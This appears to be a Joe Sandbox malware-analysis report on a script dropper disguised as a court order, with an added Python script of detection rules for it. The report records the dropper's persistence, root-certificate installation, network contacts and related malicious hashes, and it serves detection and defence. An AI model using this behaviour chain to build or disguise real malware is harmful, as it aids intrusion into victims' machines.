Source: C:\Windows\System32\wscript.exe TID: 3152 | Thread sleep time: -60000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360 | Thread sleep time: -3000s >= -60s
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe TID: 3360 | Thread sleep time: -1000s >= -60s
Accesses Audio hardware information via COM
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E30629D1-27E5-11CE-875D-00608CB78066}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49} (2 occurrences)

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (11 occurrences)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX (8 occurrences)
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004356C7 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetVersion,GetVersion,FreeLibrary, 5_2_004356C7
Stores large binary data to the registry
Source: C:\Windows\System32\wscript.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.24.116.148 80
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.27.127.62 187

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004D1780 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 5_2_004D1780
Contains functionality to query Windows version
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_00413770 GetStdHandle,GetFileType,_vsnprintf,GetVersion,RegisterEventSourceA,ReportEventA,DeregisterEventSource,MessageBoxA,_vsnprintf,WriteFile, 5_2_00413770
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query CPU information (cpuid)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe | Code function: 5_2_004156B0 cpuid 5_2_004156B0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.zip VolumeInformation (5 occurrences)
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)

Behavior Graph

Behavior Graph ID: 348744 | Sample: CourtOrder_84549380... | Start date: 23/08/2017 | Architecture: WINDOWS | Score: 96

The graph rendered as text (parent -> child; counts in brackets are, per the report's legend, created registry values and created files; for sync.exe the graph gives a single count):

main (the sample)
  -> wscript.exe [1 registry value, 15 files]
       dropped: sync.exe (PE32)
       started: schtasks.exe
       DNS/IP: sm.uploads.im 104.24.116.148, port 80 (CloudFlareInc, United States)
       DNS/IP: image.ibb.co 104.27.127.62, port 443 (CloudFlareInc, United States); 2 similar packets combined
       (1 further connected IP hidden at this level)
       signatures: Accesses Audio hardware information via COM; Installs new ROOT certificates; System process connects to network (likely due to code injection or exploit)
       (2 further signatures hidden at this level)
  -> sync.exe [3]
       started: cmd.exe
       started: cmd.exe
            started: cmd.exe
                 started: net.exe

Simulations

Behavior and APIs

Time | Description
11:20:02 | Sleep call for process wscript.exe modified from: 60000ms to: 20000ms
11:20:05 | Sleep call for process wscript.exe modified from: 60000ms to: 20000ms (6 occurrences)
11:24:00 | Run new Task: sync command: C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe
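The behavior graph and the task run logged above describe one chain: the script host drops a PE into %TEMP%, connects out, writes a certificate Blob under the ROOT store, spawns schtasks.exe, and the scheduled task "sync" later runs the dropped binary, which reaches net.exe through two cmd.exe hops. The script below is an added example, not part of the Joe Sandbox report: it encodes that chain as rules over Sysmon-style process, file, network and registry events and resolves the ancestry of each new process so the net.exe rule fires only when a binary under AppData\Local\Temp is somewhere up the tree. The event records are constructed to mirror the report; the PIDs, the parent of sync.exe (a stand-in for the task scheduler) and the schtasks.exe command line are assumptions, since the report does not show them.

```python
import re

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
ROOT_STORE = re.compile(r"\\systemcertificates\\root\\certificates\\", re.I)

# Constructed events mirroring the report's behaviour graph and Simulations table.
# PIDs, the parent pid 700 of sync.exe and the schtasks.exe arguments are assumptions.
SAMPLE_EVENTS = [
    {"type": "process_create", "pid": 1000, "ppid": 500,
     "image": r"C:\Windows\System32\wscript.exe", "cmd": "wscript.exe CourtOrder_845493809.wsf"},
    {"type": "network_connect", "pid": 1000, "dst": "104.24.116.148", "port": 80},
    {"type": "file_create", "pid": 1000, "magic": "MZ",
     "target": r"C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe"},
    {"type": "registry_set", "pid": 1000, "value": "Blob",
     "key": r"HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8"},
    {"type": "process_create", "pid": 1002, "ppid": 1000,
     "image": r"C:\Windows\System32\schtasks.exe", "cmd": "schtasks.exe"},
    # Task "sync" fires at 11:24:00; pid 700 stands in for the task scheduler host.
    {"type": "process_create", "pid": 2000, "ppid": 700,
     "image": r"C:\Users\LUKETA~1\AppData\Local\Temp\BackupClient\sync.exe", "cmd": "sync.exe"},
    {"type": "process_create", "pid": 2001, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"type": "process_create", "pid": 2002, "ppid": 2001, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"type": "process_create", "pid": 2003, "ppid": 2002, "image": r"C:\Windows\System32\net.exe", "cmd": "net.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def process_table(events):
    """pid -> (image, ppid), built from the process_create events."""
    return {e["pid"]: (e["image"], e["ppid"]) for e in events if e["type"] == "process_create"}


def ancestors(pid, table):
    """Yield the image of pid and of each ancestor; stops at the first pid we never saw created."""
    while pid in table:
        image, ppid = table[pid]
        yield image
        pid = ppid


def detect(events):
    """Return a sorted list of (rule, pid) alerts for the dropper chain."""
    table = process_table(events)
    alerts = set()
    for e in events:
        image = table.get(e["pid"], (e.get("image", ""), None))[0]
        name = basename(image)
        if e["type"] == "file_create" and name in SCRIPT_HOSTS and e.get("magic") == "MZ":
            alerts.add(("script_host_drops_pe", e["pid"]))
        elif e["type"] == "network_connect" and name in SCRIPT_HOSTS:
            alerts.add(("script_host_network", e["pid"]))
        elif e["type"] == "registry_set" and name in SCRIPT_HOSTS and ROOT_STORE.search(e["key"]):
            alerts.add(("script_host_installs_root_cert", e["pid"]))
        elif e["type"] == "process_create":
            parent = basename(table.get(e["ppid"], ("", None))[0])
            if name == "schtasks.exe" and parent in SCRIPT_HOSTS:
                alerts.add(("script_host_schedules_task", e["pid"]))
            # Walk up from the parent: any ancestor running out of %TEMP% is enough.
            if name == "net.exe" and any(TEMP_DIR.search(a) for a in ancestors(e["ppid"], table)):
                alerts.add(("temp_binary_reaches_net_exe", e["pid"]))
    return sorted(alerts)


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:34s} pid={pid}")
```

The ancestry walk is what keeps the net.exe rule from firing on an administrator's interactive cmd.exe: the cmd.exe hops are neutral, and the alert is attributed to the binary in %TEMP% that started them.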

Antivirus Detection

Initial Sample

Source | Ratio | Cloud
CourtOrder_845493809.wsf | 36/58 | virustotal

Dropped Files

Source | Ratio | Cloud
C:\Users\LUKETA~1\AppData\Local\Temp\sfbI1UOK.jpg | 18/58 | virustotal

Domains

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Context
CloudFlareInc | MixVideoPlayer.exe | b7f643f3db49c624e51335c2ee51408291018c8a0507581a024c0a452a26efb1 | malicious | 104.31.93.137
CloudFlareInc | 9Delivery-Details.js | ddb0955484e036672b7f92fa6576364357a568eae8609115fd741c220eb55803 | malicious | 198.41.214.183
CloudFlareInc | 25ghrdhhahznt.exe | b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98 | malicious | 104.25.38.108
CloudFlareInc | internationalprimopdf.exe | 600408029d622447c7bab40a0de9c67b35037fa1c0fa69b7f24e06f8f75ef181 | suspicious | 104.16.4.133
CloudFlareInc | 80aqulasmuts.exe | b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98 | malicious | 104.25.38.108
CloudFlareInc | verschickt Artikelnummer via DHL.pdf.exe | 7e4f213497690234e042903ff82932e785744fb1d17019a9dc502a53c072b107 | malicious | 104.16.40.2
CloudFlareInc | Magno Player.exe | 2f102af1783c4b6c396fd4b8a43658ae54db6355a9bbd89b9cc05b7475d7efb1 | malicious | 104.31.92.137
CloudFlareInc | 81xeuvrqvaews.exe | b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98 | malicious | 104.25.37.108
CloudFlareInc | salesforce.com.doc | 97266ce01e32cca96d55a0b5bc562f8c756d4f2147e1bb618c5769a2e227f020 | malicious | 104.16.38.47
CloudFlareInc | 1Delivery-Details.js | c97db996f24f752f916efb7ba020c80be65bc7c364fa2b5f351cbebfd700091a | malicious | 198.41.214.186
CloudFlareInc | 27gmhsmxougsnk.exe | b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98 | malicious | 104.25.38.108
CloudFlareInc | Quote #9907L.doc | a49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62 | malicious | 104.27.195.88
CloudFlareInc | Quote #9907L.doc | a49705d9325ce8d87b1f24e92a3b64164ab0051eb3efbc0fc775d579959d9a62 | malicious | 104.27.194.88
CloudFlareInc | 89MV RAYLEIGH Agency Appointment_Vessel#U9Particulars.exe | a6b1fe7f3748af3f566be9b03c8f6f26c962e9a4c351324e9d29d6e97e5a9e28 | malicious | 198.41.214.184
CloudFlareInc | 21guarjlzihlc.exe | b9951284e71c0af5e0d9662c0dfea3db8afcb3e065cb5a3704c91eac5da74e98 | malicious | 104.25.38.108

Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection
unknown | 11Evaluation and Quote.jar | 1c097d4143ab4d5ef840fe2d756cb26533f6cfd84c76a9ac2eac1efa212130a9 | malicious
unknown | 11Evaluation and Quote.jar | 1c097d4143ab4d5ef840fe2d756cb26533f6cfd84c76a9ac2eac1efa212130a9 | malicious

      Screenshot